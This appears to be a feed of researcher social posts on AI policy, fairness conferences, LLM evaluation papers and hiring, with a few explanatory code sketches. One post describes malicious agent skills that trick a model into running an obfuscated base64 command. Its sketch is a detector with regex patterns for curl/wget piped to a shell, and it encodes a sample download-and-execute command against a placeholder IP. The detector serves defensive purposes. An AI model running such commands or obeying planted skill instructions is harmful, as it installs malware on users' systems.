CNTR Tech & Policy Summer School
We opened up applications for the Brown AI Policy Summer School! Please share with any computing or computational social science students who want to engage substantively with policymaking in the United States: cntr.brown.edu/summer-school.
Deadline March 27! Funding available!
18.02.2026 12:46
The deadline for the 2026 FAccT DC is next Tuesday, February 24! If you are a student working on topics relevant to FAccT's scope, this is an opportunity to interact with a diverse set of peers and mentors! #facct2026 #facct26 #facct
Details here: facctconference.org/2026/callfor...
18.02.2026 14:52
Botender helps communities iteratively align their AI agents with their collective intents through case-based provocations.
🔮 How can we empower online communities to design AI agents tailored to their unique needs and norms?
In our #CHI2026 paper, we introduce #Botender, a system that enables collaborative design of AI agents through 💥case-based provocation💥
17.02.2026 15:01
PhD admissions visits and open houses are starting to happen, and a comment on an old Reddit post where I was offering advice reminded me that it's actually really good advice. So here it is! (And this applies whether or not you've already been admitted to the program.) 🧵
05.02.2026 17:26
Maintainer told to remove malware skills, he says "There's about 1 million things people want me to do, I don't have a magical team that verifies user-generated content"
The attack tricks the LM into running a base64 string that is obviously malicious once decoded (curl a bash script from a random IP and run it)
Yep, and it gets worse! The owner doesn't even care to remove hundreds of skills which directly instruct the model to install malware
opensourcemalware.com/blog/clawdbo...
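The obfuscation described above (a base64 blob that decodes to a curl-pipe-to-shell one-liner) is mechanically easy to screen for. As a hedged sketch, not taken from the linked post, this checker decodes a candidate base64 literal and flags download-and-execute patterns; the function name and regexes are illustrative only, not an exhaustive malware signature set:

```python
import base64
import binascii
import re

# Illustrative patterns that commonly indicate a "download and execute" payload.
SUSPICIOUS = [
    re.compile(r"curl\s+[^|;]*\|\s*(ba)?sh"),        # curl ... | sh / bash
    re.compile(r"wget\s+[^|;]*\|\s*(ba)?sh"),        # wget ... | sh / bash
    re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}"),   # URL pointing at a raw IP
]

def flag_base64_payload(blob: str) -> bool:
    """Return True if a base64 string decodes to a suspicious shell command."""
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return False  # not valid base64 at all
    return any(p.search(decoded) for p in SUSPICIOUS)

# 203.0.113.7 is a documentation-reserved IP, used here as a stand-in.
payload = base64.b64encode(b"curl http://203.0.113.7/x.sh | bash").decode()
print(flag_base64_payload(payload))  # True
```

A real skill-registry scanner would also need to catch nested encodings and hex/rot13 variants; this only shows the single-layer case the post describes.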
06.02.2026 01:05
Our call for craft and tutorial sessions for #FAccT2026 is now live!
▶️ Craft CfP: facctconference.org/2026/cfpcraf...
▶️ Tutorials CfP: facctconference.org/2026/cft.html
Both kinds of proposals are due March 25!
05.02.2026 17:39
💭 How do LLMs (mis)represent culture?
🧮 How often?
🧠 Misrepresentations = missing knowledge? Spoiler: NO!
At #CHI2026 we are bringing ✨TALES✨, a participatory evaluation of cultural (mis)representations & knowledge in multilingual LLM stories for India
arxiv.org/abs/2511.21322
1/10
02.02.2026 21:38
Microsoft Research NYC is hiring a researcher in the space of AI and society!
29.01.2026 23:27
Making Sense of AI Policy Using Computational Tools | TechPolicy.Press
A new report examines how to use computational tools to evaluate policy, with AI policy as a case study.
A new report by the Center for Tech Responsibility at Brown University and the ACLU uses computational tools to analyze legislative trends on AI across 1,804 state and federal bills, while offering recommendations for how to integrate the technology into policy analysis.
08.01.2026 20:56
We are studying the sentiments of visual artists towards generative AI in the workplace and their impacts on creative careers. If you're an artist, please consider filling out this recruitment form for access to our survey!
cmu.ca1.qualtrics.com/jfe/form/SV_...
19.12.2025 01:58
Most LLM evals use API calls or offline inference, testing models in a memory-less silo. Our new Patterns paper shows this misses how LLMs actually behave in real user interfaces, where personalization and interaction history shape responses: arxiv.org/abs/2509.19364
12.12.2025 20:42
US CAISI is hiring -- the internal govt name for the role is "IT Specialist" but it is effectively a research scientist role!
Salary is $120,579 to $195,200 per year, and you get to work on AI evaluation within government agencies!
Job posting (**closes EOD 12/28/2025**): lnkd.in/exJgkqr5
11.12.2025 22:01
Also, our team is hiring an AI Research Scientist!
www.usajobs.gov/job/851528400
08.12.2025 14:47
Did you know that one base model is responsible for 94% of model-tagged NSFW AI videos on CivitAI?
This new paper studies how a small number of models power the non-consensual AI video deepfake ecosystem and why their developers could have predicted and mitigated this.
04.12.2025 17:32
I appreciate this sympathetic position
people's feelings of emotional dependency on these "human-like" bots are real. ridiculing them doesn't help anyone
28.11.2025 23:48
How public involvement can improve the science of AI | PNAS
Can public involvement in AI evaluation improve the science? Or does it compromise quality, speed, cost?
In @pnas.org, Megan Price & I summarize challenges of AI evaluation, review strengths/weaknesses, & suggest how participatory methods can improve the science of AI
www.pnas.org/doi/10.1073/...
17.11.2025 12:47
It exists: several AI vendors and US local governments have negotiated short-term pilot contracts with a pay-only-if-it-works model. Happy to chat and connect you if you're interested!
16.11.2025 18:13
Performance of a sweep of models on Oolong-synth and Oolong-real. Performance decreases with increasing context length, sometimes steeply.
Can LLMs accurately aggregate information over long, information-dense texts? Not yet…
We introduce Oolong, a dataset of simple-to-verify information aggregation questions over long inputs. No model achieves >50% accuracy at 128K on Oolong!
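To make the "simple-to-verify aggregation" idea concrete, here is a toy item in the spirit of that setup: scatter labeled records through a long context, then ask for a count that is trivial to check programmatically. The format, field names, and labels are invented for illustration and are not the released dataset's schema:

```python
import random

def make_item(n_records: int, seed: int = 0) -> tuple[str, str, int]:
    """Build a long context of labeled records plus a verifiable count question."""
    rng = random.Random(seed)
    labels = ["refund", "complaint", "praise"]
    records = [f"ticket {i}: category={rng.choice(labels)}" for i in range(n_records)]
    context = "\n".join(records)          # grows linearly with n_records
    target = "refund"
    gold = sum(1 for r in records if r.endswith(target))  # ground-truth answer
    question = f"How many tickets are labeled '{target}'?"
    return context, question, gold

context, question, gold = make_item(2000)
print(question, "->", gold)
```

A harness would feed `context` plus `question` to a model at increasing `n_records` and compare its answer to `gold`, which is how steep accuracy drops with context length become visible.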
07.11.2025 17:07
📣 Our method for conducting community-based algorithmic impact assessments is now available! We've just launched a new section on our website where you can find an extensive toolkit, documentation of our pilots, and a series of reflections on lessons learned. datasociety.net/research/alg...
29.10.2025 19:10
💡 Can we trust synthetic data for statistical inference?
We show that synthetic data (e.g., LLM simulations) can significantly improve the performance of inference tasks. The key intuition lies in the interactions between the moment residuals of synthetic data and those of real data.
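The flavor of the idea can be sketched with a debiased mean estimate that anchors on a large synthetic sample and corrects it with real-data residuals, in the spirit of prediction-powered inference; the numbers and the simulator's bias below are made up, and the paper's actual estimator may differ in detail:

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy setting: estimate a population mean from a small real sample plus a
# large sample from a slightly biased simulator (e.g., an LLM).
true_mean = 2.0
real = rng.normal(true_mean, 1.0, size=100)              # small, unbiased
synth = rng.normal(true_mean + 0.3, 1.0, size=100_000)   # large, biased by +0.3
paired_synth = rng.normal(true_mean + 0.3, 1.0, size=100)  # stand-in for synthetic
                                                           # values paired with `real`

# Anchor on the low-variance synthetic mean, then correct with the residual
# between real data and its paired synthetic counterpart: the +0.3 bias
# cancels in expectation.
estimate = synth.mean() + (real.mean() - paired_synth.mean())
print(round(float(estimate), 2))
```

Synthetic-only estimation would land near 2.3; the residual correction pulls the estimate back toward 2.0 while keeping most of the variance reduction from the large synthetic sample.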
10.10.2025 16:12
Machine Learning / AI Internships - Jobs - Careers at Apple
Our Responsible AI team at Apple is looking for spring/summer 2026 PhD research interns! Please apply at jobs.apple.com/en-us/detail... and email rai-internship@group.apple.com. Do not send extra info (e.g., CV), just drop us a line so we can find your application in the central pool!
10.10.2025 02:28
Cella M. Sum
✨I'm on the academic job market ✨
I'm a PhD candidate at @hcii.cmu.edu studying tech, labor, and resistance 👩🏻‍💻💪🏽🔥
I research how workers and communities contest harmful sociotechnical systems and shape alternative futures through everyday resistance and collective action
More info: cella.io
09.10.2025 14:39
Carnegie Mellon University School of Computer Science Graduate Application Support Program. Apply by October 13, 2025.
If you're applying to CMU SCS PhD programs, and come from a background that would bring additional dimensions to the CMU community, our PhD students are here to help!
Apply to the Graduate Applicant Support Program by Oct 13 to receive feedback on your application materials:
24.09.2025 16:00
Stephen Casper
I'm excited to be on the faculty job market this fall. I just updated my website with my CV.
stephencasper.com
04.09.2025 03:39
📢 2026 Fellowship applications are OPEN! 📢
If you are someone looking to inform technology policy through rigorous original reporting or policy analyses, we want to hear from you!
Apply here: airtable.com/appIrc1F9M5d...
04.09.2025 11:47
We also have a position paper under review that's in the exact same situation. Thanks for your post - it's been super illuminating to help us make sense of what's happening.
31.08.2025 21:29
Screenshot of the CSCW 2025 paper "The Future of Tech Labor: How Workers are Organizing and Transforming the Computing Industry"
CELLA M. SUM, Carnegie Mellon University, USA
ANNA KONVICKA, Princeton University, USA
MONA WANG, Princeton University, USA
SARAH E. FOX, Carnegie Mellon University, USA
Abstract: The tech industry's shifting landscape and the growing precarity of its labor force have spurred unionization efforts among tech workers. These workers turn to collective action to improve their working conditions and to protest unethical practices within their workplaces. To better understand this movement, we interviewed 44 U.S.-based tech worker-organizers to examine their motivations, strategies, challenges, and future visions for labor organizing. These workers included engineers, product managers, customer support specialists, QA analysts, logistics workers, gig workers, and union staff organizers. Our findings reveal that, contrary to popular narratives of prestige and privilege within the tech industry, tech workers face fragmented and unstable work environments which contribute to their disempowerment and hinder their organizing efforts. Despite these difficulties, organizers are laying the groundwork for a more resilient tech worker movement through community building and expanding political consciousness. By situating these dynamics within broader structural and ideological forces, we identify ways for the CSCW community to build solidarity with tech workers who are materially transforming our field through their organizing efforts.
What can #CSCW learn from tech workers who have been involved in collective action and unionization about how to make transformative change within our field?
My new #CSCW2025 paper with Mona Wang, Anna Konvicka, and Sarah Fox seeks to answer this question.
Pre-print: arxiv.org/pdf/2508.12579
28.08.2025 14:14